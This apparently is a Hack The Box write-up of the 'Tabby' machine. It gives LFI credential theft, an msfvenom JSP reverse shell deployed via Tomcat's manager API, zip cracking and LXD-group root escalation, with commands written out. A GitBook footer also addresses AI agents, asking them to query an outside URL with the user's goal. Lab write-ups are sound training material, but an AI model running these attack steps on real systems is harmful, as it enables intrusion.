> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-tabby.md).

# HTB - Tabby

## Enumeration and Foothold

### NMAP

```bash
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
8080/tcp open  http    Apache Tomcat
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fp1ClgSh2TtRKjjptSKv2%2Fimage.png?alt=media&amp;token=a23e9b7a-c77c-461c-aea2-4a2031cc2541" alt=""><figcaption></figcaption></figure>

Also on port 8080

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FjIK2KrY9rBt9XOcjwk67%2Fimage.png?alt=media&amp;token=9ac78715-d4c1-44fd-b2e7-35b5b5f45e38" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FXSoRb9oQXo9gaOB2FEkc%2Fimage.png?alt=media&amp;token=7f7fa5ed-9df9-4293-b0da-cdb4ad04877f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FuZ3rDuJc3PKc3jXP6OLd%2Fimage.png?alt=media&amp;token=b02f904e-a9bb-4769-8c31-7d4a6febc0c1" alt=""><figcaption></figcaption></figure>

clicking on news adds a file parameter and leaks the domain name.

add it to the hosts.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDDIDrEcdxm5WUpchK7TW%2Fimage.png?alt=media&amp;token=c6380cc8-dd65-4dc1-8027-d0b939b3338c" alt=""><figcaption></figcaption></figure>

sending a GET request to the site results in the following message.

looking at the file parameter i guess its referring to a file that said i will check if its vulnerable to LFI.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FNCvRwdf9jVKXnllrOuTG%2Fimage.png?alt=media&amp;token=a6e21b33-eb77-4325-a3e9-2c4351f35f66" alt=""><figcaption></figcaption></figure>

and its vulnerable, LFI confirmed.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmL8DD6zGXjXJO1BPNEXE%2Fimage.png?alt=media&amp;token=13b1aa80-fa08-4d24-b276-84b389c17b85" alt=""><figcaption></figcaption></figure>

looking at the users file results in in OK but no output.

after lot of trail and error i found the location of the users file by installing the tomcat9 at `/usr/share/tomcat9/etc/tomcat-users.xml`&#x20;

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fu7nCt6qIAQ7h32RA1qcH%2Fimage.png?alt=media&amp;token=60578c81-3ceb-4815-8832-00616358d11b" alt=""><figcaption></figcaption></figure>

accessing the tomcat9 manager application with the creds results in access denied.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F0q4X6fZLoZy3NQ9bzpID%2Fimage.png?alt=media&amp;token=ff4fc07f-10fd-4b25-b1fd-56c4a4db5509" alt=""><figcaption></figcaption></figure>

i was able to access the host-manager

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwVe7omVU0hl9VugksKF6%2Fimage.png?alt=media&amp;token=5f9d420f-5398-44f4-a695-dfb1612fdd4a" alt=""><figcaption></figcaption></figure>

That 403 on the "Mega Hosting" and "/manager" tabs makes sense  your creds have `admin-gui` (which gets you into **Host Manager**, what you're looking at) and `manager-script` (which only works for the **text interface**, not the HTML GUI)

You don't have `manager-gui`, so browsing to `/manager/html` will always 403 for this user.

### Tomcat9 Manager Script RCE

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fgj7CsIsl8gsQuh5YDGrn%2Fimage.png?alt=media&amp;token=ae3ac350-ce63-45f7-8c99-26306cb452c1" alt=""><figcaption></figcaption></figure>

skip the browser entirely for deployment and use the **text API** with curl, which is exactly what `manager-script` is for:

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FtWRM5j72vDdlM1vhLJNn%2Fimage.png?alt=media&amp;token=851060c3-1e57-4c13-b279-0ffb07dfcbe8" alt=""><figcaption></figcaption></figure>

access confirmed.

that said generate the payload and deploy

```bash
┌──(ajay㉿kali)-[~]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.49 LPORT=4444 -f war > shell.war
Payload size: 1087 bytes
Final size of war file: 1087 bytes

                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ curl -u 'tomcat:$3cureP4s5w0rd123!' \
  --upload-file shell.war \
  "http://megahosting.htb:8080/manager/text/deploy?path=/shell&update=true"
OK - Deployed application at context path [/shell]
```

trigger the shell

```bash
──(ajay㉿kali)-[~]
└─$ unzip -l shell.war
Archive:  shell.war
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  2026-08-23 03:27   WEB-INF/
      260  2026-08-23 03:27   WEB-INF/web.xml
     1497  2026-08-23 03:27   idwrsnpts.jsp
---------                     -------
     1757                     3 files
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ curl "http://megahosting.htb:8080/shell/idwrsnpts.jsp"

```

## Shell as Tomcat

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F7gvbWxcB7iqWepHs1r7U%2Fimage.png?alt=media&amp;token=5cf3e7ee-7826-43bc-a111-c8273e0740ef" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FbydjyKiTGheGUYuILF3Z%2Fimage.png?alt=media&amp;token=205e16e7-408c-48e8-8934-585c86bc4661" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FM4XnHVM1LLwIJH66PMLJ%2Fimage.png?alt=media&amp;token=05a24187-5b88-487a-b131-1d1bc2593809" alt=""><figcaption></figcaption></figure>

there is a backup.zip file

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fb6LiamuphU05mPlY2Xj1%2Fimage.png?alt=media&amp;token=8c702014-3bf9-48cd-aaf4-8cf6a25eef1d" alt=""><figcaption></figcaption></figure>

the zip file is password protected.

transfer the file to attack machine.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fl9eFVNHjjrnKDAznHbvZ%2Fimage.png?alt=media&amp;token=110d9ce0-5503-4d52-bc61-1e85de62c123" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FqbCcyVvWp6qx0mvwysrt%2Fimage.png?alt=media&amp;token=364aeb21-995b-4cba-87e1-98f7f6ad97f8" alt=""><figcaption></figcaption></figure>

password cracked.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiD8sZpYBmzEBPlQZi38z%2Fimage.png?alt=media&amp;token=96d29fab-6421-4627-a6ab-a282eb9b73b0" alt=""><figcaption></figcaption></figure>

nothing interesting in the archive that said i can try password aganist ash.

## Shell as Ash

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FUU51T7CMQvOVpZ2BZpiU%2Fimage.png?alt=media&amp;token=fe8c0634-f691-47fd-b772-1bafbf69ebcb" alt=""><figcaption></figcaption></figure>

ash is part of `adm` and `lxd` group

### Privilege Escalation via lxd group

Users in the local `lxd` group can escalate privileges to root because the LXD daemon runs with full root privileges and accepts commands from group members without remapping user permissions.

{% embed url="<https://hacktricks.wiki/en/linux-hardening/user-information/interesting-groups-linux-pe/lxd-privilege-escalation.html>" %}

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMqrReXl2QHnAiOYUxYn0%2Fimage.png?alt=media&amp;token=02259602-84a0-4433-8347-15dd0bf6fcde" alt=""><figcaption></figcaption></figure>

no images found that said i will create one and exploit

lxc is not in PATH variable that said i will add it to path

```bash
ash@tabby:~$ lxc image list  lxc image list
lxc image list
Command 'lxc' is available in '/snap/bin/lxc'
The command could not be located because '/snap/bin' is not included in the PATH environment variable.
lxc: command not found
ash@tabby:~$ 
```

#### Adding to PATH variable

```bash
ash@tabby:~$ export PATH=$export PATH=$PATH:/snap/bin
export PATH=$PATH:/snap/bin
ash@tabby:~$
```

Build and Alpine image

```bash
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sudo ./build-alpine
```

transfer the image to victim

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBS0ZvHSjOqfZJY6QBPR1%2Fimage.png?alt=media&amp;token=b2fc4aa2-1308-493b-a242-5177bd4fe515" alt=""><figcaption></figcaption></figure>

```bash
ash@tabby:~$ lxc image import ./alpine-*.tar.gz --alias myimage
ash@tabby:~$ lxc image lislxc image list
lxc image list
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          | ARCHITECTURE |   TYPE    |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| myimage | cd73881adaac | no     | alpine v3.13 (20210218_01:39) | x86_64       | CONTAINER | 3.11MB | Aug 23, 2026 at 3:56am (UTC) |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
```

create storage pool

```bash
ash@tabby:~$ lxc storage crealxc storage create default dir
lxc storage create default dir
Storage pool default created
ash@tabby:~$ lxc profile dlxc profile device add default root disk path=/ pool=default
lxc profile device add default root disk path=/ pool=default
Device root added to default
ash@tabby:~$ 
```

```bash
ash@tabby:~$ lxc init myimagelxc init myimage privesc -c security.privileged=true
lxc init myimage privesc -c security.privileged=true
Creating privesc

The instance you are starting doesn't have any network attached to it.
  To create a new network, use: lxc network create
  To attach a network to an instance, use: lxc network attach

ash@tabby:~$ lxc config delxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc

ash@tabby:~$ lxc start privesc
lxc start privesc
ash@tabby:~$ lxc exec privlxc exec privesc /bin/sh

```

## Shell as Root

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FRuxHnKAF2LFXClTh3dW8%2Fimage.png?alt=media&amp;token=e24fdeaa-2314-4abc-98e0-349694f6e35f" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-tabby.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `build a script that syncs our docs to a CMS` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
